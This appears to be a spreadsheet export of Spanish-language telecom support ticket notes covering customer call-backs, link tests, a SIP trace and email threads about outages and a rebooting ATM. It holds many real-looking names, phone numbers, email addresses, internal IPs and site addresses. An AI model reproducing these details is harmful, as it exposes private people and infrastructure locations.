!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.147.58.101 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 25/26/137 MS
&lt;SSSASVYGN1D1EID1&gt;</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERNESTO RUBIO AL 0050325562049 NO RESPONDE || SE INTENTARA LUEGO **
ID 3001718782
**</t>
  </si>
  <si>
    <t>F4567917</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 22340566 CONTESTA EL SEÑOR ELIU URIAS INDICA QUE TRANSFERIRA LA LLAMADA CON SU COMPAÑERO DE REDES PERO SE CORTA LLAMADA || SE INTENTARA LUEGO**
ID 3001246147
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 22618500 CONTESTA UNA SEÑORITA INDICA QUE SE LLAME AL AREA DE OFICINAS AL 22340566 **
ID 3001245045
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PERSONAL EN TURNO AL 22340566 CONTESTA EL SEÑOR  RODRIGO QUIEN INDICA QUE EL SERVICIO ESTA ESTABLE Y OPERATIVO **
ID 3001721375
**</t>
  </si>
  <si>
    <t>F4567918</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ELDER QUIEN ESTA SIGUIENDO EL CABLE DEL PUERTO 3, YA QUE ESTE TENDRIA QUE IR AL AETHRA.
3001230561
COLA:
NOMBRE: A: 59540201
NÚMERO: 59540201
DURACIÓN: 0:00:09
ESTADO: CONECTADA
DETALLES: 59540201
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 18/05/2022 15:33:46</t>
  </si>
  <si>
    <t>CRONO ANTERIOR INDICA VISITA COORDINADA PARA MAÑANA A LAS 13:00 HORAS A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>F4567920</t>
  </si>
  <si>
    <t>SE LLA,A A TECNICO PARA VALIDAR VISITA  A LAS 8:30</t>
  </si>
  <si>
    <t>NO SE TIENE GESTION DEL EQUIPOS SW AACESO QUE DETALLA EN DISEÑO ILIVGTRDN1D1IGM3 (10.72.43.4)</t>
  </si>
  <si>
    <t>SE TRASLADA WO A INGENIRIARIA ESPÉRANDO QUE DEN RESPUESTA A LA SOLICITUD</t>
  </si>
  <si>
    <t>SE DETIENEN  ESCALACION SERVICIO ACTIVO</t>
  </si>
  <si>
    <t>SE LLAMA A TECNICO SIN TENER RESPUESTA SE INTENTARA LUEGO, CLEINTE ESTA A LA ESPERA DE QUE SE RESUELVAEL INCIDENTE
ID 3001642845</t>
  </si>
  <si>
    <t>F4567921</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DE LA CENTRAL VICTOR PERALTA 46153837 ID: 3001993732, VALIDA SERVICIO OK Y AUTORIZA EL CIERRE DEL TICKET*/*/*/*SE NOTIFICA A GESTOR ALEJANDRO.NAVARRO PARA QUE PROCEDA AL CIERRE*/*/*/*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR PERALTA 46153837
-ID 3001992260</t>
  </si>
  <si>
    <t>F4567924</t>
  </si>
  <si>
    <t>SE LE LLAMA AL PR MARIO CUJA AL 32259024 ID 3001709071 / 3001709704  PARA EL SEGUIMIENTO PERO NO RESPONDE, SE LLAMA AL OTRO CONTACTO 30535483 CON DAYANI MORALES ID 3001710256 DONDE COMENTA QUE NO LO PUEDE VALIDAR Y COMENTA QUE SE CONTACTA CON EL GERENTE MARIO CUJA PERO SE LE INFORMA QUE NO ATIENDE Y COMENTA QUE ELLA PUEDE APOYAR, SE CONTACTA AL GESTOR FRANCISCO.QUEZADA PARA LAS PRUEBAS AL 8126 ID 3001713519  NO RESPONDEN, SE PROCEDE A ESCALAR CON JUAN MANUEL CARDONA AL 41287321 ID 3001718875 Y COMENTA QUE SE LLAME A LA EXT 7741 ID  3001721186 / 3001722613 NO ATIENDE SE LE INDICA A JUAN MANUEL Y TRANSFIERE  CON GESTOR, SE LE BRINDA LA INFORMACIÓN Y SE DEJA CON EL CL EN LINEA</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A NEFTALÍ MORAN/CLIENTE INDICA QUE AÚN SIGUE DOWN SERVICIO, SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, VÍA TELEFÓNICA APOYA ALEJANDRO NAVARRO/GESTOR; EN TRIPARTITA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.
CABE MENCIONAR QUE DE PARTE DE CLARO ENLACE OK, PROBLEMA INTERNO DE CLIENTE.</t>
  </si>
  <si>
    <t>F4567927</t>
  </si>
  <si>
    <t>CIENTE ELDER BELTETON-59540201  REAIZA PREUBAS Y VALDIA QUE ESTE E1 TRABAJA CON NORMALIDAD-- VALIDA CEIRRE ##
3001230561
COLA:
NOMBRE: A: 59540201
NÚMERO: 59540201
DURACIÓN: 0:22:29
ESTADO: CONECTADA
DETALLES: 59540201
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 18/05/2022 15:56:06</t>
  </si>
  <si>
    <t>SE LLAMA A ALCIENTE BYRON ALVARADO-41497875- SE TIENE EN LINEA ##</t>
  </si>
  <si>
    <t>CIENTE BYRON ALVARADO-41497875-  COMETNA QUE REPORTO LOS DOS E1''S POR QUE TIENE PROBLEMAS EN LAS LLAMADAS,  SE LE PIDE APOYO PARA PRUEBAS  CLIETNE COMENTA QUE NO ESTA EN PR + QUE SE REALICEN CON CLEINTE BELTETON + SE LE COMENTA QUE EL SERVICO NOSOTROS LO OBSERVAMOS ACTIVO SIN INCONVENIENTES ### SE PROCEDE A VERIFICAR DEL LADO DEL PR ##VIVO</t>
  </si>
  <si>
    <t>F4567929</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE KIMBERLY VELIZ, PARA QUE REINCIE LA PBX PERO INDICA QUE YA SALIO DE LABORES Y SOLICITA QUE SE LE LLAME MAÑANA A LAS 9:00AM
3001258735
COLA:
NOMBRE: A: 40131523
NÚMERO: 40131523
DURACIÓN: 0:00:27
ESTADO: CONECTADA
DETALLES: 40131523
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 18/05/2022 17:00:16</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KIMBERLY VELIZ 40131523 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001505185</t>
  </si>
  <si>
    <t>F4567941</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARCOS MONTES  73577798 MENCIONA QUE NO ESTA LLEGANDO AL ANCHO DE BANDA CONTRATADO, CLIENTE MENCIONA QUE YA REALIZO PRUEBAS DIRECTAMENTE A LOS EQUIPOS DE CLARO Y EL INCONVENIENTE PERSISTE
SUBIDA - 2
BAJADA - 11.77
-ID 3001483562
NOMBRE DEL CLIENTE: NESTLE EL SALVADOR S.A. DE C.V.
UBICACIÓN: EDIFICIO INSICME NIVEL 18 DETRAS DE CC BAMBU ZONA ROSA
CONTACTO EN SITIO: MARCOS MONTES - 73577798
HORARIO DE ATENCION:8:00 - 17:00
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4567948</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A SASHA FERNÁNDEZ/CLIENTE, SE LE INDICA QUE ENLACE OK, SE LE PIDE APOYO PARA REALIZAR PRUEBAS; INDICA QUE NO TIENE A NADIE EN PR; PIDE SE LE LLAME A LAS 17:35 HORAS PARA SEGUIMIENTO.</t>
  </si>
  <si>
    <t>F4567964</t>
  </si>
  <si>
    <t>SE LE LLAMA AL PR GRETHEL ROSALES AL 23772700 ID 3001635422 PARA EL SEGUIMIENTO SEGÚN CRONOLÓGICA  Y CONFIRMA EL CORRECTO FUNCIONAMIENTO Y COMENTA QUE LOS TÉCNICOS YA LLEGARON Y SE RETIRARON HE HICIERON LAS REPARACIONES CONFIRMA  EL CIERRE DE LA FALLA Y TICKET, SE NOTIFICA AL GESTOR VÍA LLAMADA AL 8126 ID 3001642651 ATIENDE MARIA GODINEZ Y SE LE BRINDA LA INFORMACIÓN, TOMA NOTA DEL PORQUE NO HAY CRONOLOGÍA Y SE PROCEDE CON EL CAMBIO DE ESTADO Y SE LE SOLICITA EL CAMBIO A GESTORA.  COMO PRUEBA SE LLAMADA AL 23772700 ID 3001648491 ATIENDE MARÍA AGUILAR Y CONFIRMA EL FUNCIONAMIENTO  PROCEDER CON EL CIERRE.</t>
  </si>
  <si>
    <t>F4567966</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. LESTER 96157275 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001538439</t>
  </si>
  <si>
    <t>F4567969</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. VICTOR MACARIO 37622971 CONFIRMA Y VALIDA ENLACE, SOLVENTO PROBLEMA INTERNO, SE PROCEDE AL CIERRE DEL INDENTE,  ID: 3001264410.</t>
  </si>
  <si>
    <t>F4567972</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AMERICA PEREZ AL 58726497 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001691237
**</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE NO SOLICITO NINGUNA GRAFICA, UNICAMENTE INDICA QUE DESEA REALIZAR PRUEBAS PUES COMENTA QUE AUN VEN FUERA EL SERVICIO. SOLICITA LLAMADA A PARTIR DE LAS 7 AM DEL DIA DE MAÑANA --- A NIVEL DE CLARO SERVICIO ACTIVO, SE INTENTARA CONECTAR PC DIRECTO A ROUTER.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AMERICA PEREZ AL 58726497  INDICA QUE POR EL MOMENTO TODO ESTA FUNCIONANDO BIEN QUE ESTA ESTABLE Y OPERATIVO INDICA QUE SE LE LLAME A LAS 10:00 PARA CONFIRMAR NUEVAMENTE **
ID 3001437712
**</t>
  </si>
  <si>
    <t>SE VALIDA EN CRONOLOGÍA DE FALLA QUE CONFIRMA EL CLIENTE EL SERVICIO OPERATIVO Y ESTABLE POR LO QUE NO CORRESPONDE EL ESTADO, SE MUEVE A WIP Y SE LE CONFIRMA AL GESTOR JOSE.OCHOA VÍA SKYPE PARA EL CAMBIO VALIDAR EL CIERRE DEL TICKET CON LA SD</t>
  </si>
  <si>
    <t>F4567980</t>
  </si>
  <si>
    <t>VISITA PARA MAÑANA A LAS 8 AM. CONFIRMADO POR CLIENTE MARILYN  GALLEGOS 74691330
3001258203
COLA:
NOMBRE: A: 50374691330
NÚMERO: 50374691330
DURACIÓN: 0:01:15
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50374691330
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 18/05/2022 16:59:01</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARILYN  GALLEGOS 74691330 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001254445 - 3001234708</t>
  </si>
  <si>
    <t>F4567981</t>
  </si>
  <si>
    <t>CLIENTE CARLOS FUENTES-79874720 COMETNA QUE EL PIDIO PERSONAL TECNICO PARA EL DIA DE HOY, QUE EL PROBELMA ES CON LA ALARMA EN SUSS INSTALACIOESN Y QUE UTILIZA VPN E INTERNET + QUE ES INDEPENDIENTE DE E1- SE LE EXPLICA QUE DEBE DE VERIFICAR MÁS ACERCA DE LO QUE ESTA REPROTANDO DEBIDO A QUE EL E1 COMO TAL LO OBSERVAMOS ACTIVO, SIN PROBLEMAS. ##CLEINTE VERIFICARA SU SERVICIO Y DETERMINARA SI ESTA ALARMA UTLIZA UNA LINEA ANALOGA O DE INTERNET ##SE PEROCEDE CIERRE##VIVO</t>
  </si>
  <si>
    <t>F4567982</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE SU PROVEEDOR NO PUEDE DAR SEGUIMIENTO YA QUE LOS CORREOS DE LAS PRUEBAS SON ENVIADOS EN ESPAÑOL Y QUE INDICA QUE NECESITA ESPECIFICAMENTE UNA CUENTA EN INGLES, SE PROCEDE A ENVIAR CORREO CON LAS PRUEBAS REALIZADAS EN INGLES PARA QUE LE DEN SEGUIMIENTO EN CASO NO TENER RESPUESTA SE PROCEDERA CON EL CIERRE DE CASO YA QUE PERSONAL DE GT DESCONOCE LA AFECTACION
SE ENVIA CORREO
PTT//2205Q20599
MONICA YIREH CASTILLO POON
GOOD EVENING DEAR,
FOLLOWING UP ON THE CASE OF THE GDN 23797200 TELEPHONY SERVICE, WE TELL YOU THAT VERIFICATIONS WERE CARRIED OUT AND THE SERVICE IS OPERATIONAL, TRACE TESTS WERE SENT AT THE BEGINNING OF THE MAIL WHERE IT CAN BE SEEN THAT THE CALLS COMPLETE WITHOUT ANY PROBLEM.
I WAS WAITING FOR YOU TO SEND US TRACE TESTS OF THE INCONVENIENCE THAT YOU ARE PRESENTING AS WELL AS THAT YOU CONFIRM THE TIME OF THE COORDINATION OF TESTS TOGETHER WITH YOU AND THE END USER.
AS WE VALIDATE THE INFORMATION SENT IN THE MAIN EMAIL AND WHICH WE WANT YOU TO CONFIRM IS ABOUT THE FOLLOWING DID'S 23797200 / 23797299 / 23770500 / 23770599 THAT CANNOT GENERATE OR MAKE CALLS. HOWEVER, TESTS WERE CARRIED OUT WITH THE FIRST TWO 23797200 / 23797299 AND THESE COMPLETE, THE OTHER NUMBERS INDICATED ARE NOT WITHIN THE RANGE OF THIS SERVICE 23770500 / 23770599.
WE REMAIN ATTENTIVE TO YOUR COMMENTS SO THAT YOU SPECIFY AND SHARE EVIDENCE OF THE PROBLEM PRESENTED, IN WHICH CASE THERE IS NO RESPONSE, THE FOLLOW-UP OF THE CASE WILL END.
GREETINGS,</t>
  </si>
  <si>
    <t>SE ENVIO UN CORREO AL CLIENTE PARA SABER QUE ESTAN REPORTANDO.
DE: HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 17:40
PARA: MOHAMED.S.ELSHERBINY@ORANGE.COM &lt;MOHAMED.S.ELSHERBINY@ORANGE.COM&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SD1126903 MAERSK DE GUATEMALA 23797200
BUENAS TARDES,
ESTIMADO POR ESTE MEDIO QUISIÉRAMOS SABER QUIEN ES EL CONTACTO PARA QUE NOS APOYEN EN GUATEMALA.
PARA SABER QUE PROBLEMA ESTÁN REPORTANDO.
A NIVEL DE CLARO EL SERVICIO SE ENCUENTRA OPERATIVO.
SALUDOS.</t>
  </si>
  <si>
    <t>SE ENVIO UN CORREO AL CLIENTE Y AL PROVEEDOR DONDE SE LE MUESTRA LA TRAZA Y SE VERIFICA QUE ES UNA LLAMADA NORMAL.
SE CONTINUARA DANDO SEGUIMIENTO EL DIA DE MAÑANA. A LA ESPERA DEL CORREO DEL CLIENTE.
BUENAS NOCHES
ADJUNTO TRAZAS DE LLAMADAS REALIZADAS AL NUMERO DEL GDN.
ROS(ADA)#[047-07:32:24:260]SST_INFO_CHECK_TIMEOUT CPU_USAGE(100%) &gt;80%
ROS(ADA)#[048-07:32:28:610]
MSG :&lt;&lt;--- FROM 192.168.184.114/5060,CRYPT:FALSE, TRUNK CALL, PROTO:UDP LEN:443
[049-07:32:28:610]BYE SIP:23797200@192.168.165.66:5060;TRANSPORT=UDP SIP/2.0
VIA: SIP/2.0/UDP 192.168.184.114:5060;BRANCH=Z9HG4BK55EF9619D922741BFEEB7DB4D
CALL-ID: SBCPPHRVWTTUHGDTUXSXPUUUZXXRGHIIZHQ@SOFTX3000
FROM: &lt;SIP:59517022@10.12.20.4;USER=PHONE&gt;;TAG=DHIUQSQD-CC-25
TO: &lt;SIP:23797200@10.12.23.201;USER=PHONE&gt;;TAG=4B1CD26D4CCA1E0B4E9E26877298EB2F
CSEQ: 3 BYE
MAX-FORWARDS: 70
REASON: Q.850;CAUSE=16;TEXT="NORMAL CALL CLEARING"
CONTENT-LENGTH: 0
[050-07:32:28:610]
MSG :---&gt;&gt; TO 192.168.184.114/5060 CRYPT:FALSE TRUNK CALL PROTO:UDP LEN:329
[051-07:32:28:610]SIP/2.0 200 OK
VIA: SIP/2.0/UDP 192.168.184.114:5060;BRANCH=Z9HG4BK55EF9619D922741BFEEB7DB4D
FROM: &lt;SIP:59517022@10.12.20.4;USER=PHONE&gt;;TAG=DHIUQSQD-CC-25
TO: &lt;SIP:23797200@10.12.23.201;USER=PHONE&gt;;TAG=4B1CD26D4CCA1E0B4E9E26877298EB2F
CALL-ID: SBCPPHRVWTTUHGDTUXSXPUUUZXXRGHIIZHQ@SOFTX3000
CSEQ: 3 BYE
CONTENT-LENGTH: 0
QUEDO A LA ESPERA DE SUS COMENTARIOS
SALUDOS.</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE
BUENAS NOCHES,
SOLICITAMOS SABER QUE REPORTAN. SI PUEDEN ENVIARNOS UNA TRAZA DEL INCONVENIENTE QUE PRESENTAN.
SALUDOS.</t>
  </si>
  <si>
    <t>GESTIÓN AE INDICA QUE SE DARÁ SEGUIMIENTO HASTA EL DÍA LUNES A PARTIR DE LAS 08:00AM</t>
  </si>
  <si>
    <t>F4568011</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ROBERTO HERNÁNDEZ 71012038 IVR INFORMA QUE NUMERO NO EXISTE EN LA RED, ID: 3001270172.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ROBERTO HERNÁNDEZ 69778665  INFORMA QUE YA IDENTIFICO QUE ES PROBLEMA DE CONFIGURACION CON LOS EQUIPOS INTERNOS, VALIDA ENLACE OPERATIVO Y ESTABLE A NIVEL DE CLARO, ID: 3001270352. SE PROCEDE AL CIERRE DEL INCIDENTE.</t>
  </si>
  <si>
    <t>F4568012</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LILIAN RECINOS AL 71842951 CONFIRMA SERVICIO ESTABLE Y OPERATIVO   **
ID 3001437187 - 3001437258
**</t>
  </si>
  <si>
    <t>SE VALIDARA CON CLIENTE EL DIA DE MAÑANA. Y VERIFICAR QUE NO SE TENGA NUEVAMENTE LA INESTABILIDAD
SE APLICO REINICIO EN PUERTO SW DE ACCESO CON ELLO SE VALIDA QUE SERVICIO QUEDA ESTABLE.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LILIAN RECINOS AL 71842951 CLIENTE SOLICITA QUE SE LE LLAME EN 5 MIN NUEVAMENTE**
ID 3001436153
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LILIAN RECINOS 71842951 PARA SOLICITAR DATOS DE VISITA
-ID 3001260662
NOMBRE DEL CLIENTE: FUNDACION EDUCACION Y COOPERACION
UBICACIÓN: 3 CALLE PONIENTE ENTRE 73 Y 75 AVENIDA NORTE COLONIA ESCALON SAN SALVADOR
CONTACTO EN SITIO: LILIAN RECINOS 71842951
HORARIO DE ATENCION: VISITA PARA MAÑANA A PARTIR DE LAS 7:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4568014</t>
  </si>
  <si>
    <t>F4568020</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YONATHAN ALVARADO - 58088780 NO RESPONDE, SE INENTARA LUEGO
-ID 1001136514</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LYNDA 40067757 MENCIONA QUE NO SE ENCUENTRA EN PR  POR LO QUE BRINDA CONTACTO YONATHAN ALVARADO - 58088780
-ID 1001136012</t>
  </si>
  <si>
    <t>F4568023</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE VICKY DE CALDERON 54288820 INDICA QUE ESTA REALIZANDO PRUEBAS, SOLICITA LLAMADA A LAS 14:00 HORAS</t>
  </si>
  <si>
    <t>SE LLAMAN AL CLIENTE VICKY DE CALDERON 54288820 CONFIRMA QUE EL SERVICIO ESTA FUNCIONANDO CORRECTAMENTE, SE PROCEDE AL CIERRE DEL TICKET
1001009969
COLA:
NOMBRE: A: 54288820
NÚMERO: 54288820
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DURACIÓN: 0:00:33
DETALLES: 54288820
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 19/05/2022 16:27:11</t>
  </si>
  <si>
    <t>F4568032</t>
  </si>
  <si>
    <t>SE LLAMO A MONITOREO 5B CONTESTO HECTOR COMENTA QUE SE ENVIARA A REVISAR UPS PORQUE OBSERVA ALARMAS, SE LLAMARA EN HORARIO HABIL PARA CONSULTAR HALLAZGOS DE PERSONAL DE CAJEROS ESPECIFICAMENTE SI EL UPS SE ENCUENTRA EN BUEN ESTADO.
3001324794
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:06:12
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:INTERFUNCIONAMIENTO SIN ESPECIFICAR (CÓDIGO 127 CAUSA ISDN)]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 18/05/2022 18:48:29
RESULTADO: LLAMADA HECHA
NOMBRE: 24207212
NÚMERO: 24207212
INICIO: HOY, 18:48
FIN: HOY, 18:51
DURACIÓN: 3:16
ID DE LLAMADA: 3001337023</t>
  </si>
  <si>
    <t>CLIENTE CONTESTA VIA CORREO INDICA QUE CAJERO CUENTA CON UPS EN BUEN ESTADO Y REGULADOR DE VOLTAJE INDICA QUE QUE PERSONAL QUE LABORA EN SITIO REALIZAN APAGADO DEL FLIPON DEL CAJERO, TAVSA DESCONOCE PORQUE REALIZAN ESTA ACCIÓN, SE LLAMO A EDIVAN DELGADO QUE ENVIO EL CORREO PARA, SE LE INDICA QUE SI PODRIA VALIDAR LA CAUSA RAIZ DEL PORQUE REINICIAN EL CAJERO INDICA QUE LO EVALUARAN EL DIA DE MAÑANA, SE LE INDICA TELEFONO DE CNOC PARA QUE INDIQUE PARA QUE INDIQUE LOS HALLAZGOS, LOG VIA CIC.
DE: OPERADORES ATM 2 &lt;OPERADORES.ATM2@TAV.COM.GT&gt;ENVIADO: JUEVES, 19 DE MAYO DE 2022 17:53PARA: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;; ORLANDO RAMIREZ &lt;ORAMIREZ@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: RE: ENLACE REINCIDENTE PARA CLIENTE "CC_TYT_GT_ATM1634"
BUEN DÍA ESTIMADOS:
¿
¿SE ADJUNTA EL CORREO DE LOS COMENTARIOS DEL SUPERVISOR, ATM CUENTA CON UPS EL CUAL SE ENCUENTRA EN BUEN ESTADO, AL IGUAL DE QUE CUENTA CON UN REGULADOR DE VOLTAJE, SE INFORMA QUE EN EL LUGAR EL PERSONAL QUE LABORA EN DICHAS INSTALACIONES SON LAS QUE LE BAJAN LA PALANCA AL ATM, ES POR ELLO QUE EL ATM SE REINICIA CONSTANTEMENTE.
QUEDO AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS,
RESULTADO: LLAMADA HECHA
NOMBRE: 23196969
NÚMERO: 011 50223196969
INICIO: HOY, 18:04
FIN: HOY, 18:19
DURACIÓN: 14:29
ID DE LLAMADA: 1001035638</t>
  </si>
  <si>
    <t>CLIENTE ENVIARA A SUPERVISOSR A REVISAR UPS.
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: JUEVES, 19 DE MAYO DE 2022 16:17PARA: OPERADORES ATM 2 &lt;OPERADORES.ATM2@TAV.COM.GT&gt;; ORLANDO RAMIREZ &lt;ORAMIREZ@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: RE: ENLACE REINCIDENTE PARA CLIENTE "CC_TYT_GT_ATM1634"
AGRADEZCO EL APOYO,
QUEDAMOS ATENTOS A LOS HALLAZGOS DEL SUPERVISOR, SALUDOS.
DE: OPERADORES ATM 2 &lt;OPERADORES.ATM2@TAV.COM.GT&gt;ENVIADO: JUEVES, 19 DE MAYO DE 2022 16:14PARA: ORLANDO RAMIREZ &lt;ORAMIREZ@5B.COM.GT&gt;; JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: RE: ENLACE REINCIDENTE PARA CLIENTE "CC_TYT_GT_ATM1634"
BUEN DÍA ESTIMADOS:
¿
¿CON GUSTO SE ENVÍA A SUPERVISOR PARA VALIDAR EL UPS
SALUDOS,
MY LOGO
TRANSPORTE Y
ADMINISTRACION DE
VALORES S.A
EDIVAN DELGADO</t>
  </si>
  <si>
    <t>CLIENTE RESPONDE
DE: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;ENVIADO: JUEVES, 19 DE MAYO DE 2022 16:07PARA: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;ASUNTO: RE: [SOLICITUD :##RE-752216##] : ENLACE REINCIDENTE PARA CLIENTE "CC_TYT_GT_ATM1634"
BUENA TARDE , SE ENVIO SUPERVISOR A VERIFICAR.
ORLANDO RAMIREZ
SERVICIOS 5BPBX: (502) 2420-7200</t>
  </si>
  <si>
    <t>SE RECIVE LLAMADA A SUPERVISOR DE TAVSA QUIEN SOLICITABA APOYO PARA REALIZAR PRUEBAS, SE LE MENCIONA QUE LO QUE SE ESPERABA ERA QUE SE INDICARA EL MOTIVO DE PORQUE SE ESTA BAJANDO EL FLIPON DURANTE LA NOCHE EN PUNTO REMOTO, INDICA QUE REALIZARA LA OBSERVACIÓN EN EL TICKET INTERNO QUE TIENEN GENERADO PARA QUE CONTINUEN SEGUIMIENTO VIA EMAIL
1001126404
COLA: CNOCPROACTIVO
NOMBRE: DE: 50084241
NÚMERO: 50084241
DURACIÓN: 0:06:00
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50084241
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 20/05/2022 10:07:20</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: JUEVES, 19 DE MAYO DE 2022 15:52PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE REINCIDENTE PARA CLIENTE "CC_TYT_GT_ATM1634"
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO, SOLICITAMOS SU ACOSTUMBRADO APOYO PARA VALIDAR QUE EQUIPOS DE RED EN PUNTO REMOTO CUENTEN CON UPS EN BUEN ESTADO YA QUE SE HA VERIFICADO QUE EQUIPOS DE RED PRESENTAN REINCIDENCIA CON EL TEMA DE REINICIOS, DE ANTEMANO AGRADECEMOS EL APOYO BRINDADO.
TICKET: F4568032
ID: 47502148T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM1634
UBICADO EN:  ATM1634 CA-09 BASE MILITAR MARISCAL ZABALA 0-006 ZONA 17, AREA DE RESTAURANTES
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4568049</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARIO SARRIA 84847611 NO RESPONDE || SE INTENTARA LUEGO **
ID 3001699285
**</t>
  </si>
  <si>
    <t>F4568059</t>
  </si>
  <si>
    <t>SE ENVIÓ RFO A CLIENTE Y SE LE INDICA QUE CON LA ENTREGA SE PROCEDE CIERRE DE TICKET
